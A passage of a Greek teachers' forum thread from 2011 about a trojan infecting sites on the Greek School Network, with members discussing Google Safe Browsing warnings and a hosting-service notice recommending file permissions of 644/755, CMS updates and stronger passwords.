Κε Τσιωτάκη, η επαναφορά που περιμένατε έγινε ή μάλλον ακόμα; Να πιέσουμε κι εμείς το helpdesk;

Μήπως έχω εγώ το πρόβλημα;
Για μένα θα πω μόνο ότι είμαι ο τύπος του δασκάλου που αν κάνω ένα μάθημα για 50η φορά θα αλλάξω για 52η φορά τις σημειώσεις μου

Παναγιώτης Τσιωτάκης

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 3165
  • I love you 3000
    • Panagiotis Tsiotakis
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #26 στις: 04 Μάι 2011, 09:21:30 πμ »
εμένα και στο στέκι μου βγάζει μήνυμα για "κακόβουλο σιτε" κάθε φορά που το επισκέπτομαι (πατώ συνέχεια και εισέρχομαι)
από τη δική μου ιστοσελίδα "κατέβασα" το wordpress (php κομμάτι) και είναι όλες στατικές html σελίδες

φυσικά, μπορείς να στείλεις μήνυμα και συ στο helpdesk...

Παναγιώτης

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #27 στις: 04 Μάι 2011, 09:53:44 πμ »
Απ' όσο έχω καταλάβει, από την υπηρεσία safebrowsing του google ο ιστοχώρος http://users.sch.gr/ptsiotakis θεωρείται κακόβουλος και γι' αυτό μπλοκάρει όποιες σελίδες έχουν παραπομπή σε αυτόν:
http://www.google.com/safebrowsing/diagnostic?site=users.sch.gr/ptsiotakis

Ο δικός μου καθώς και το στέκι δεν χαρακτηρίστηκαν ως κακόβουλοι, πιθανώς επειδή έβγαλα άμεσα τον trojan:
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr
http://www.google.com/safebrowsing/diagnostic?site=alkisg.mysch.gr/steki

Αυτή η υπηρεσία safebrowsing χρησιμοποιείται και από τον Firefox και από τον Google chrome:
http://www.google.com/tools/firefox/safebrowsing/

Για να σταματήσει κάποιος ιστοχώρος να θεωρείται κακόβουλος, η google λέει ότι πρέπει να γίνει:
Αίτηση επανεξέτασης ιστοτόπου για κακόβουλο λογισμικό

Αφού ελέγξετε τον ιστότοπό σας και βεβαιωθείτε ότι είναι καθαρός, μπορείτε να υποβάλετε αίτημα προς επανεξέταση. Λάβετε υπόψη ότι θα χρειαστεί να επαληθεύσετε την κατοχή του ιστότοπου για να μπορέσετε να ζητήσετε να γίνει εξέτασή του.
...


Οπότε Παναγιώτη θα πρότεινα (1) να κάνεις τα παραπάνω που λέει η google για να σταματήσει το site σου να θεωρείται κακόβουλο, (2) να βγάλεις για λίγες μέρες το website σου από το προφίλ σου ώστε να μην υπάρχουν links από το στέκι στο site σου ώστε εν τέλει να μην βγαίνουν προειδοποιήσεις στα άλλα μέλη (και μετά από λίγες μέρες το ξαναβάζεις), και (3) και βασικότερο, να τα ψάλλεις στο helpdesk γιατί προφανώς θα έπρεπε να είχαν βγάλει τον trojan από την πρώτη μέρα και όχι να τον έχουν και να τον θρέφουνε ακόμα και να μας παιδεύουν όλους...  ;D


Εγώ απορώ γιατί δεν βγήκαν ακόμα να παραδεχτούν ότι υπήρξε (και ακόμα υπάρχει) παραβίαση ασφαλείας του server και να ενημερώσουν τους χρήστες του ΠΣΔ ότι τα δεδομένα τους μπορεί να έχουν κλαπεί, οπότε τουλάχιστον να αλλάξουμε κωδικούς, ενώ αν είχαμε online ευαίσθητα δεδομένα όπως πληροφορίες για web banking ή πιστωτικές να λάβουμε τα μέτρα μας, κτλ κτλ... μου φαίνεται εντελώς απαράδεκτος ο χειρισμός του γεγονότος.

Παναγιώτης Τσιωτάκης

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 3165
  • I love you 3000
    • Panagiotis Tsiotakis
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #28 στις: 04 Μάι 2011, 10:14:51 πμ »
έκανα τα 1 και 2

δεν είχα ασχοληθεί με τη google, καθώς ο τελευταίος έλεγχος ήταν στις 21/4 και θεωρούσα ότι θα κάνει έλεγχο ξανά!!

Λάμπρος Μπουκουβάλας

  • Η παιδεία είναι: στους φτωχούς, ΠΛΟΥΤΟΣ. Στους πλούσιους, ΣΤΟΛΙΔΙ. Στους νέους, ΚΑΙ ΤΑ ΔΥΟ (Διογένης) !
  • Δεινόσαυρος
  • *****
  • Μηνύματα: 1226
    • http://users.sch.gr/lambrosbouk
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #29 στις: 04 Μάι 2011, 01:14:10 μμ »
πάντως εγώ ΔΕΝ είχα κανένα πρόβλημα με το στέκι, ούτε με τη σελίδα του Παναγιώτη, μετά τις διορθώσεις που έγιναν τη Μ. Εβδομάδα. το μόνο που βαρέθηκα να βλέπω στην οθόνη μου, είναι το γνωστό "proxy error"...
Λάμπρος Μπουκουβάλας

http://lambrosbouk.wordpress.com
http://blogs.sch.gr/lambrosbouk

Ο Θουκυδίδης  που τον διαβάζουν οι ξένοι, αλλά όχι εμείς  έγραφε: «Αταλαίπωρος τοις πολλοίς η ζήτησις της αληθείας, και επί τα ετοίμα μάλλον τρέπονται» (Ι, 20, 3). Οι περισσότεροι δηλαδή αναζητούν αβασάνιστα την αλήθεια και στρέφονται σε ό,τι βρίσκουν έτοιμο. Δεν προβληματίζονται…

Παναγιώτης Τσιωτάκης

  • Ομάδα Νέου Λυκείου
  • *
  • Μηνύματα: 3165
  • I love you 3000
    • Panagiotis Tsiotakis
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #30 στις: 04 Μάι 2011, 07:46:31 μμ »
νομίζω πως όλα είναι εντάξει τώρα

alkisg

  • Τεχνικός / καθαρίστρια
  • *****
  • Μηνύματα: 4856
    • alkisg@im.sch.gr
    • Ο Διερμηνευτής της ΓΛΩΣΣΑΣ
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #31 στις: 04 Μάι 2011, 09:26:28 μμ »
ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.

Gnirut

  • Επισκέπτης
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #32 στις: 05 Μάι 2011, 10:49:57 πμ »
ΟΚ, συγχώνευσα το θέμα με το "κεντρικό" περί της παραβίασης ασφαλείας του ΠΣΔ.

Το ΠΣΔ ώρες-ώρες φαίνεται να πνεει τα λοίσθια πλέον. Μπορεί να είναι πεσμένο για ώρες μέσα στην ημέρα, να έχει μειωμένη ταχύτητα και να βρίθει ιών και άλλων ευγενών προγραμμάτων. Ποιος έχει την γενική εποπτεία του;

Δημήτρης Κανάς

  • Εκπαιδευτικός
  • Δεινόσαυρος
  • *****
  • Μηνύματα: 189
    • Εργαστήρι Δημοτικού Σχολείου
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #33 στις: 07 Μάι 2011, 06:38:09 μμ »
Πάντως να αναγνωρίσουμε πως το (μεγάλο) πρόβλημα είναι στις υπηρεσίες φιλοξενίας και όχι πρόσβασης στο διαδίκτυο από τα σχολεία... 

Δε ξέρω από ταχύτητες...

Νίκος Αδαμόπουλος

  • Γενικός διαχειριστής
  • *****
  • Μηνύματα: 2777
  • Πύργος Ηλείας
    • ΚΕΠΛΗΝΕΤ Ηλείας
Απ: Παραβίαση ασφαλείας των σελίδων του ΠΣΔ
« Απάντηση #34 στις: 11 Μάι 2011, 12:09:33 μμ »
Αγαπητοί χρήστες του Πανελλήνιου Σχολικού Δικτύου,

θα θέλαμε να σας ενημερώσουμε, πως για λόγους ασφαλείας προβήκαμε σε αλλαγή των δικαιωμάτων των αρχείων σε 644 (read+write owner, read group, read other) και σε 755 των φακέλων (read+write+execute owner, read+execute group, read+execute other). Η αλλαγή αυτή ήταν αναγκαία λόγω της αλλοίωσης αρκετών ιστοσελίδων που παρουσιάστηκε το τελευταίο διάστημα. Σε αρκετές από αυτές τις ιστοσελίδες διαπιστώθηκε προσθήκη κακόβουλου κώδικα, γεγονός που οφείλεται σε λανθασμένα δικαιώματα των php αρχείων. Συνεπώς η ρύθμιση των δικαιωμάτων ήταν αναγκαία ενέργεια, καθώς απαιτείται και από τον νέο μηχανισμό ασφαλείας suPHP που εφαρμόζεται από το Πανελλήνιο Σχολικό Δίκτυο. Σε διαφορετική περίπτωση εμφανίζεται το μήνυμα “Internal Server Error”.

Για τους παραπάνω λόγους συνιστούμε να μη γίνεται ρύθμιση των δικαιωμάτων των αρχείων και των φακέλων σε 777 (read+write+execute από όλους), καθώς υπάρχει μεγάλος κίνδυνος αλλοίωσης  και δυσλειτουργία της Ιστοσελίδας.

H ορθή ρύθμιση  είναι:

Για  τα αρχεία              644 ( rw-.r--.r-- ) 
Για  τα Directories:      755  ( rwx.r-x.r-x ) 

Υπενθυμίζουμε επίσης πως πρέπει να γίνονται αναβαθμίσεις των CMS πακέτων στις νεότερες εκδόσεις, όταν αυτές διατίθενται, καθώς αποσκοπούν στην διόρθωση κενών ασφαλείας των προηγούμενων εκδόσεων.  Επίσης προτείνουμε  την περιοδική αλλαγή του κωδικού πρόσβασης (password) στο λογαριασμό σας και τον ορισμό ενός δύσκολα προβλέψιμου password.

Για οποιαδήποτε απορία/διευκρίνηση καθώς και δυσλειτουργία της Ιστοσελίδας σας παρακαλούμε να μας ενημερώσετε είτε καταχωρώντας μια αναφορά προβλήματος/αιτήματος στο http://helpdesk.sch.gr είτε αποστέλλοντας e-mail στο webhost (at) sch.gr.

Σας ευχαριστούμε για τη συνεργασία σας. Θα θέλαμε επίσης να επισημάνουμε και εκφράσουμε τα συγχαρητήρια μας, για  την εξαιρετική δουλειά που γίνεται στις ιστοσελίδες σας και τις εφαρμογές που αναπτύσσετε και λειτουργείτε.

Mε εκτίμηση
 
ΠΑΝΕΛΛΗΝΙΟ ΣΧΟΛΙΚΟ ΔΙΚΤΥΟ
Υπηρεσία Φιλοξενίας ιστοσελίδων
URL:  http://www.sch.gr/webhosting